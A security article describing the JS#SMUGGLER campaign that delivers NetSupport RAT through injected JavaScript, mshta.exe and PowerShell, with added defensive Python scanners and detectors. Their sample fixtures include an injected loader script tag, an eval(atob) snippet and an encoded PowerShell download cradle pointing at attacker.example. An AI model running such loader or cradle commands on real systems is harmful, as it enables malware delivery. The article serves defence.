Researchers at Securonix have documented a sophisticated multi‑stage malware campaign dubbed JS#SMUGGLER, in which attackers compromise legitimate websites and use them as launch pads to deliver NetSupport RAT, a remote access trojan built from the legitimate NetSupport Manager product. The campaign primarily targets corporate users who visit trusted business sites during normal work activities, which significantly increases the likelihood of a successful infection.
JS#SMUGGLER multi‑stage attack chain and use of NetSupport RAT
The JS#SMUGGLER infection chain follows a “nested” architecture that complicates analysis and detection. It consists of three main components: a heavily obfuscated JavaScript loader, an HTA file executed via mshta.exe, and a PowerShell payload that ultimately installs NetSupport RAT. This layered design helps evade traditional security tools that focus on single artifacts, static signatures, or isolated processes.
NetSupport RAT is the name given to abused builds of NetSupport Manager, a legitimate remote administration tool that is frequently repurposed in malware campaigns; because the binary is signed commercial software, reputation‑based controls often let it run. Once deployed, it gives the attacker full remote control of the compromised host: interactive desktop access, file management, command execution, data exfiltration, and even the ability to route traffic through the victim as a proxy node. In effect, the infected workstation becomes a controlled remote agent in the adversary’s infrastructure.
Initial compromise: injected JavaScript, hidden redirects and victim profiling
The attack begins with a stealthy redirect injected into the code of a legitimate site. This code loads an external JavaScript file named phone.js from an attacker‑controlled domain and executes it in the background, without any visible indication to the user. Because the redirect is embedded into trusted pages, it bypasses many users’ traditional caution around “suspicious links.”
The phone.js script is strongly obfuscated, making static analysis and signature‑based detection difficult. Its first task is device profiling: it determines whether the client is a mobile or desktop device and adjusts the subsequent attack path accordingly. For mobile visitors, it displays a fullscreen iframe, while desktop users are silently handed off to a second‑stage script that continues the infection chain.
A notable feature of JS#SMUGGLER is the use of an invisible iframe that triggers the redirect only on the first visit associated with a specific identifier. This “single‑use trigger” significantly reduces the chance that security teams or automated scanners will observe the malicious behavior, because subsequent visits to the same URL may appear completely benign. Analysts replaying a suspected page should therefore treat a clean second fetch as inconclusive and retrieve it again with a fresh session, identifier, and source address.
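The injection pattern described above (an off‑origin script tag, a hidden iframe, or an obfuscated inline snippet dropped into otherwise legitimate HTML) is something a site operator can check for on their own pages. The scanner below is an added example and is not code from the Securonix write‑up; the allowed host list and the sample HTML are constructed for illustration, and the inline‑script markers are heuristics to be tuned per site.

```python
"""Scan a page's HTML for signs of an injected web loader.

Added example (not from the original report). A site owner runs scan_html()
over pages they serve; the allowed hosts and the sample page are assumptions.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts this site is expected to load scripts from (assumption for the example).
ALLOWED_SCRIPT_HOSTS = {"www.example.com", "cdn.example.com"}

# Heuristic markers of obfuscated inline loaders; tune to your own site.
SUSPICIOUS_INLINE = ("eval(", "atob(", "unescape(", "fromCharCode",
                     'createElement("script")', "createElement('script')")


def _is_hidden(attrs: dict) -> bool:
    """True for an iframe the user could not see (display:none, zero size, hidden)."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style or "hidden" in attrs:
        return True
    return attrs.get("width", "") in ("0", "0px") or attrs.get("height", "") in ("0", "0px")


class InjectionScanner(HTMLParser):
    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = {h.lower() for h in allowed_hosts}
        self.findings = []          # list of (kind, detail) tuples
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script":
            src = a.get("src")
            if src:
                host = (urlsplit(src).hostname or "").lower()
                # A relative src has no host and is same-origin; any other host must be allow-listed.
                if host and host not in self.allowed_hosts:
                    self.findings.append(("external-script", src))
            else:
                self._in_script = True
        elif tag == "iframe" and _is_hidden(a):
            self.findings.append(("hidden-iframe", a.get("src", "")))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and any(m in data for m in SUSPICIOUS_INLINE):
            self.findings.append(("obfuscated-inline-script", data.strip()[:60]))


def scan_html(html: str, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return findings for one HTML document, in document order."""
    parser = InjectionScanner(allowed_hosts)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: two legitimate scripts plus the three injection shapes.
SAMPLE_HTML = """<html><head>
<script src="/assets/app.js"></script>
<script src="https://cdn.example.com/jquery.min.js"></script>
<script src="https://attacker.example/phone.js"></script>
</head><body>
<h1>Quarterly invoices</h1>
<iframe src="https://attacker.example/lp" style="display:none; width:0; height:0"></iframe>
<script>var k=["aHR0cHM6Ly9hdHRhY2tlci5leGFtcGxlL3N0YWdlMg=="];eval(atob(k[0]));</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_HTML):
        print(f"{kind}: {detail}")
```

Run it against a crawl of your own site and diff the output over time: a new external‑script host or a hidden iframe appearing on a page that did not have one is the signal, not the absolute count.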
Second stage: HTA abuse, mshta.exe and in‑memory PowerShell execution
For desktop systems, the first‑stage JavaScript dynamically constructs a URL for an HTA payload and launches it using the Windows utility mshta.exe. HTA (HTML Application) files let HTML plus JScript or VBScript run through mshta.exe with the privileges of the logged‑on user and outside the browser sandbox, so the script can reach the file system, COM objects, and other processes. MITRE ATT&CK documents this as System Binary Proxy Execution: Mshta (T1218.005), a common “living‑off‑the‑land” technique that leverages a trusted, signed system binary.
Once executed, the downloaded HTA acts as an additional loader. It writes an encrypted PowerShell stager to a temporary file on disk, decrypts it, and then runs the result directly in memory. The HTA window is minimized or hidden by disabling standard interface elements, so the entire process remains invisible to the user. This design avoids obvious UI artifacts while chaining legitimate components: browser → mshta.exe → PowerShell.
The decrypted PowerShell payload is responsible for downloading and installing the final malware, NetSupport RAT, and establishing persistence on the host. By favoring in‑memory execution and short‑lived temporary files, the attackers reduce on‑disk traces and complicate detection by traditional antivirus products that rely on file scanning and straightforward signatures.
Attribution: possible links to the SmartApeSG threat group
The domain used to host the JavaScript loader, boriver[.]com, is flagged by the Abuse.ch platform as associated with the SmartApeSG threat group, also known as HANEYMANEY and ZPHP. Public reporting indicates that this group has been actively using JavaScript injections on legitimate sites to distribute NetSupport RAT since late 2024, following a similar operational playbook.
Despite these overlaps in infrastructure and tooling, Securonix assesses the attribution with caution. It remains unclear whether JS#SMUGGLER is a direct operation of SmartApeSG or whether another actor is reusing domains, techniques, and payloads associated with that group. No definitive links to a specific country, APT cluster, or financially motivated crew have been established.
Enterprise risks and mitigation strategies against JS#SMUGGLER and NetSupport RAT
JS#SMUGGLER poses particular risk to enterprise environments because it exploits users’ trust in well‑known, previously safe websites. In this model, traditional user awareness guidance to “avoid unknown links” is less effective: the malicious chain can start from a routinely used vendor portal, news site, or business partner’s web page that has been compromised.
1. Enforce strict Content Security Policy (CSP)
A CSP is set by the operator of a website, so it protects visitors to the sites the organization itself runs rather than employees browsing third‑party sites. On sites you operate, a restrictive script‑src (plus frame‑src) allowlist that omits 'unsafe-inline' blocks both an injected inline snippet and a script tag pointing at an attacker domain such as the phone.js loader, and it keeps a hidden iframe from loading; that breaks the first stage of JS#SMUGGLER whenever the attacker only altered page content. CSP is no help once the attacker can also rewrite response headers, and it has no notion of HTA: the HTA file is fetched and executed outside the browser, so that step must be handled by download filtering at the web proxy and by the endpoint controls below. For employees’ outbound browsing, rely on DNS or web‑proxy filtering and browser policies rather than on CSP.
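To make the difference between a weak and a strict policy concrete, here is a small evaluator that decides whether a given script load would pass a CSP script‑src directive. It is an added example, not part of the original article or of any browser's implementation: it models 'none', 'self', 'unsafe-inline', scheme sources and host sources with a leading wildcard, and deliberately leaves out nonces, hashes, ports and path matching (an assumption of the example). The page origin, the two policies and the injected URL are constructed.

```python
"""Check whether a CSP would let an injected script load.

Added example, not from the original article. A simplified CSP script-src
matcher: 'none', 'self', 'unsafe-inline', scheme sources (https:) and host
sources with an optional leading wildcard. Nonces, hashes, ports and paths are
not modelled (assumption), so read True as "not blocked by the parts modelled".
"""
from typing import Optional
from urllib.parse import urljoin, urlsplit


def parse_csp(header: str) -> dict:
    """Split a CSP header into {directive: [source expressions]}."""
    directives = {}
    for chunk in header.split(";"):
        tokens = chunk.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def _host_source_matches(source: str, script_url: str) -> bool:
    """Match a host source such as https://cdn.example.com or *.example.com."""
    u = urlsplit(script_url)
    host = (u.hostname or "").lower()
    scheme, sep, rest = source.partition("://")
    if not sep:                       # no scheme in the source: any scheme is acceptable here
        scheme, rest = "", source
    if scheme and scheme.lower() != u.scheme.lower():
        return False
    pattern = rest.split("/", 1)[0].rsplit(":", 1)[0].lower()   # strip path and port
    if pattern == "*":
        return True
    if pattern.startswith("*."):
        return host.endswith(pattern[1:])
    return host == pattern


def script_allowed(csp: str, page_origin: str, script_url: Optional[str]) -> bool:
    """script_url=None means an inline <script> block; otherwise it is the src value."""
    directives = parse_csp(csp)
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return True                   # nothing governs scripts: the browser allows everything
    lowered = [s.lower() for s in sources]
    if lowered == ["'none'"]:
        return False
    if script_url is None:
        return "'unsafe-inline'" in lowered
    script_url = urljoin(page_origin, script_url)   # resolve relative src values
    u = urlsplit(script_url)
    for s in lowered:
        if s == "'self'":
            p = urlsplit(page_origin)
            if (p.scheme, p.hostname) == (u.scheme, u.hostname):
                return True
        elif s.endswith(":") and "/" not in s:      # scheme source, e.g. https:
            if u.scheme == s[:-1]:
                return True
        elif not s.startswith("'"):
            if _host_source_matches(s, script_url):
                return True
    return False


# Constructed scenario: a corporate site, a weak and a strict policy, and the injected loader.
PAGE = "https://www.example.com/invoices"
WEAK_CSP = "default-src 'self'; script-src * 'unsafe-inline'"
STRICT_CSP = "default-src 'self'; script-src 'self' https://cdn.example.com"
INJECTED_SRC = "https://attacker.example/phone.js"

if __name__ == "__main__":
    for name, policy in (("weak", WEAK_CSP), ("strict", STRICT_CSP)):
        print(name, "inline:", script_allowed(policy, PAGE, None),
              "injected src:", script_allowed(policy, PAGE, INJECTED_SRC))
```

The weak policy passes both the inline snippet and the off‑origin script, which is exactly the pair an injection needs; the strict one fails both while still serving the site’s own and CDN scripts. Check the policy your sites actually emit, since a stray 'unsafe-inline' or wildcard host silently collapses the control.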
2. Harden and monitor PowerShell usage
Enable PowerShell Script Block Logging (Event ID 4104), Module Logging and transcription so that the decrypted stager is recorded even though it only ever executes in memory. Execution policy is a convenience setting, not a security boundary (it is bypassed with -ExecutionPolicy Bypass or -EncodedCommand), so pair it with Constrained Language Mode enforced through WDAC or AppLocker, which removes the .NET and COM calls most stagers depend on. Security teams should baseline normal PowerShell activity and alert on suspicious patterns: -EncodedCommand or -w hidden arguments, download cradles such as Net.WebClient and Invoke-WebRequest, outbound connections made by powershell.exe, and PowerShell spawned by browsers or mshta.exe.
3. Block mshta.exe and HTA where not required
Most corporate environments have no business need for HTA applications. Blocking or restricting mshta.exe via AppLocker, Windows Defender Application Control (WDAC), or an equivalent application control solution removes a commonly abused “living‑off‑the‑land” binary from the attacker’s toolbox. Roll the rule out in audit mode first and review the events it generates, because a few legacy installers and administrative tools still rely on HTA; where mshta.exe must remain, use EDR custom rules to block it from launching with a URL on its command line and from spawning child processes.
4. Use EDR/XDR for behavioral detection
Modern EDR/XDR platforms can identify anomalous process chains (browser → mshta.exe → PowerShell), unusual parent‑child relationships, mshta.exe started with a URL rather than a local .hta file on its command line, and suspicious outbound connections to low‑reputation domains. Behavioral rules focusing on these patterns, combined with TLS inspection where appropriate, improve the chances of detecting JS#SMUGGLER‑style campaigns early in their lifecycle.
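The process‑chain and PowerShell signals listed under items 2 and 4 (the browser → mshta.exe → PowerShell lineage, and an encoded command that decodes to a download cradle) can be expressed as a few rules over process‑creation telemetry. The script below is an added example written for this page, not detection content from Securonix or any EDR vendor; the events are constructed to resemble Sysmon Event ID 1 or EDR process records, and the field names pid, ppid, image and cmdline are an assumption of the example.

```python
"""Flag the browser -> mshta.exe -> PowerShell chain and encoded download cradles.

Added example, not vendor or Securonix detection content. SAMPLE_EVENTS are
constructed; the record fields (pid, ppid, image, cmdline) are an assumption.
"""
import base64
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe", "brave.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Download/execute primitives commonly seen in stagers; extend for your estate.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|"
    r"net\.webclient|start-bitstransfer|invoke-restmethod",
    re.IGNORECASE,
)


def image_name(path: str) -> str:
    """Basename of an image path, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none.

    PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
    and expects base64 of the UTF-16LE script text.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        t = tok.lower()
        if t.startswith("-e") and "-encodedcommand".startswith(t):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def ancestry(by_pid: dict, pid: int, depth: int = 4) -> list:
    """Image names from the process itself up through `depth` ancestors."""
    names = []
    while pid in by_pid and len(names) < depth:
        names.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return names


def detect(events: list) -> list:
    """Run the three rules over a batch of process-creation events."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        chain = ancestry(by_pid, e["pid"])
        me, parents = chain[0], chain[1:]
        pretty = " > ".join(reversed(chain))
        if me == "mshta.exe" and any(p in BROWSERS for p in parents):
            findings.append({"rule": "mshta-from-browser", "pid": e["pid"], "chain": pretty})
        if me in POWERSHELL:
            if "mshta.exe" in parents:
                findings.append({"rule": "powershell-from-mshta", "pid": e["pid"], "chain": pretty})
            decoded = decode_encoded_command(e["cmdline"])
            if decoded and CRADLE_RE.search(decoded):
                findings.append({"rule": "encoded-download-cradle", "pid": e["pid"],
                                 "chain": pretty, "decoded": decoded})
    return findings


def _enc(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry: one malicious chain plus a benign admin script.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": '"chrome.exe"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://attacker.example/update.hta"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('https://attacker.example/stage.ps1')")},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Walking several ancestors rather than only the direct parent matters here: if the HTA launch goes through an intermediate process, the browser is still in the lineage. The benign inventory script produces nothing, and the decoded cradle text is attached to the finding so an analyst sees the stager's intent without re‑decoding it by hand.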
As multi‑stage campaigns abusing tools like NetSupport RAT become more prevalent, organizations should regularly reassess security policies, update defensive technologies, and invest in user education that emphasizes caution even on “trusted” websites. Combining layered technical controls, continuous monitoring, network segmentation, and a mature incident response process remains essential to limiting the impact of complex web‑borne threats such as JS#SMUGGLER.